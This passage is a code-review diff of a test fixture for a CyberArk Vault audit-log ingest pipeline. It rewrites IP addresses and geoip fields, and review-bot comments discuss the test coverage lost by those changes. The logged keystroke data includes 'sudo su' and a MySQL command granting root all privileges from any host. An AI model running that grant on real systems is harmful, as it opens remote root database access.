System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:18\",\"IsoTimestamp\":\"2021-03-15T14:11:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165120Z", + "original": "\u003c5\u003e1 2021-03-15T14:11:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n 
\u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:18\",\"IsoTimestamp\":\"2021-03-15T14:11:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", @@ -795,39 +685,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -844,7 +713,7 @@ }, "@timestamp": "2021-03-15T14:45:51.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
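Review bot: The hunk at @@ -795,39 +685,18 @@ drops the whole `destination.geo` and `source.geo` objects from the expected output, so this fixture no longer asserts anything about the pipeline's geoip enrichment of `source.ip` and `destination.ip`. If the supported test range is not expected to resolve in the test GeoIP database that is fine, but it is worth confirming, because the same result would appear if the expected file had been regenerated against an environment where geoip lookups silently returned nothing. Either way a reader of this fixture can no longer tell from the data that the geo processors ran, so consider keeping at least one event in the suite with an address that does yield geo fields.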
@@ -855,16 +724,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:45:51Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:45:51\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:45:51Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:45:51\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:45:51Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n 
\u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -878,8 +746,8 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;" }, "rfc5424": true, @@ -887,7 +755,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -900,9 +768,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615819476" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 15 07:45:51", "desc": "Keystroke logging" 
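Review bot: In the hunk at @@ -855,16 +724,15 @@ the `related.ip` array shrinks from three entries to two because `Station` and `DstHost` were both rewritten to `67.43.156.15`, whereas before they were distinct addresses. The old fixture checked that the station, source and destination addresses are all collected into `related.ip` and deduplicated; with station and destination now identical, a pipeline change that stopped mapping `Station` into `related.ip` would go unnoticed here. Picking a third distinct address from the same supported range for `Station` (a constructed example such as `67.43.156.14`) would restore that coverage; the same collapse applies to the `station` fields in the @@ -759 and @@ -900 hunks.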
@@ -913,8 +781,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.192011900Z", - "original": "\u003c5\u003e1 2021-03-15T14:45:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:45:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:45:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:45:51\",\"IsoTimestamp\":\"2021-03-15T14:45:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165124200Z", + "original": "\u003c5\u003e1 2021-03-15T14:45:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:45:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:45:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n 
